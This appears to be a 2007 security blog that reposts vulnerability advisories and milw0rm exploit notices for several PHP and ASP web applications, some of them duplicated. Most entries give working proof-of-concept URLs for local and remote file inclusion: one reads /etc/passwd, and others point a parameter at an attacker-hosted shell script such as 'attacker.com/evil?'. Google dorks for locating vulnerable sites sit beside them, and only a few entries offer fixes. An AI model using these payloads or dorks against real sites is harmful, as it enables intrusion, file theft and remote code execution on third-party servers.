Author: Janek Vind "waraxe"
Date: 19. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-52.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.dblog.it/sito/default.asp
DBlog CMS is a open source Content Management System for IIS/ASP platform.
Some days ago dBlog 2.0 hit the goal of the 110.000 platform downloads,
over 100.000 of them regarding the lastest version.
GoogleDork: inurl:"articolo.asp" "powered by dblog"
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DBlog stores all the data in JET database file with default name "dblog.mdb".
This database file is accessible from web as:
http://www.example.com/mdb-database/dblog.mdb
By fetching database anyone can obtain admin password sha hashes and then try to
crack them and gain admin privileges.
There are some mitigating factors though:
1. IIS webserver can refuse ".mdb" file download
2. database file or directory can be renamed to something else
Quick look @ real world sites shows, that ~ 20% of them are exploitable.
Considering large number of DBlog-based websites, this is serious problem IMHO.
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IIS directory restrictions, renaming directory and database file.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to pabloski, ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and all other people who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
User Manual Database - http://user-manuals.waraxe.us/
Old Books Online - http://www.oldreadings.com/
Wednesday, September 26, 2007
Local File Inclusion in Dance Music module for phpNuke
Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails
&lid=251&title=Dance%20Music%20for%20PHP-Nuke
Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com
Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's take a peek at source code of "index.php":
------------>[source code]<------------
include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");
------------>[/source code]<-----------
As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.
Proof-of-concept test:
http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd
Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154
So local file inclusion exists, but safe mode can make exploiting harder.
//-----> See ya soon and have a nice day ;) <-----//
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails
&lid=251&title=Dance%20Music%20for%20PHP-Nuke
Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com
Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's take a peek at source code of "index.php":
------------>[source code]<------------
include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");
------------>[/source code]<-----------
As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.
Proof-of-concept test:
http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd
Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154
So local file inclusion exists, but safe mode can make exploiting harder.
//-----> See ya soon and have a nice day ;) <-----//
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_83$2007
-----------------------------------------------------------------------------------------
[ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------
Author : M.Hasran Addahroni
Date : August, 4 th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv83-K-159-2007.txt
Critical Lvl : Dangerous
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PhpHostBot
version : <= 1.06
Vendor : http://www.idevspot.com/PhpHostBot.php
Description :
PhpHostBot is a webware PHP application which integrates with the popular Cpanel(WHM) web hosting control panel.
PhpHostBot supports Paypal subscriptions, free web hosting, Subdomain and Reseller account setup
and supports both dedicated server and Reseller web hosting companies
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled.
Poc/Exploit:
~~~~~~~~~~
http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?
Google Dork:
~~~~~~~~~~~
"order?page=plan_show"
Solution:
~~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn off register_globals
- use the latest version
Timeline:
~~~~~~~~~
- 27 -07 - 2007 bug found
- 4 - 08 - 2007 vendor contacted
- 7 - 08 - 2007 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~
K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
FrontAccounting version 1.13 <= Remote File Inclusion Vulnerability
#
#Dork:"FrontAccounting"
#
#Vuln Code
##############################################################################################
#
#ERROR1:accsess/login.php
#
# include_once($path_to_root . "/includes/ui/ui_view.inc"); <<< RFI
#
#
#
#
#BUG1:login.php?path_to_root
#
#Example1:http://site.com/path/accsess/login.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
##############################################################################################
#
#ERROR2:includes/lang/language.php
#
# include_once($path_to_root . "/lang/installed_languages.inc");
# include_once($path_to_root . "/includes/lang/gettext.php"); <<< RFI
#
#
#
#
#BUG2:includes/lang/language.php?path_to_root
#
#Example2:http://site.com/path/includes/lang/language.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
#
#http://sourceforge.net/projects/frontaccounting/
#
##############################################################################################
#
#>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<
#
#"Eli mouse tutan herkes kendini haykır zannedio."----------------"Eli opulcek cok insan var."
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################
# milw0rm.com [2007-09-26]
Tuesday, September 25, 2007
Nuke Mobile Entartainment Local File Inclusion
-----------------------------------------------
# Found by Seph1roth
# http://blackroots.it
-----------------------------------------------
# Vulnerable script download
http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip
# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]
# This is the vulnerable code :
# include 'modules/'.$module_name.'compatibility/data/marque.data.php';
# Found by Seph1roth
# http://blackroots.it
-----------------------------------------------
# Vulnerable script download
http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip
# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]
# This is the vulnerable code :
# include 'modules/'.$module_name.'compatibility/data/marque.data.php';
sk.log v0.5.3 Remote File Inclusion
++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++
+ Vulnerable Code
+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );
+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
Sunday, September 23, 2007
DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 32
Lines:
----------------------------------------------
require ("".$set_depth."app.lib/product.control/core.php/functions.php");
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 179
Lines:
----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 154
Lines:
----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>
----------------------------------------------
Multiple Remote Vulnerabilities
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
shadowcrew@hotmail.co.uk
http://shadow.wizhoo.com/
# milw0rm.com [2007-09-24]
Comment: PHP injection still booming.. beware with your PHP script
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 32
Lines:
----------------------------------------------
require ("".$set_depth."app.lib/product.control/core.php/functions.php");
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 179
Lines:
----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 154
Lines:
----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>
----------------------------------------------
Multiple Remote Vulnerabilities
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
shadowcrew@hotmail.co.uk
http://shadow.wizhoo.com/
# milw0rm.com [2007-09-24]
Comment: PHP injection still booming.. beware with your PHP script
Introduction
Hi all, this blog used to collect about internet security from other site. Enjoy here and you dont need to open many page. :D
Subscribe to:
Posts (Atom)
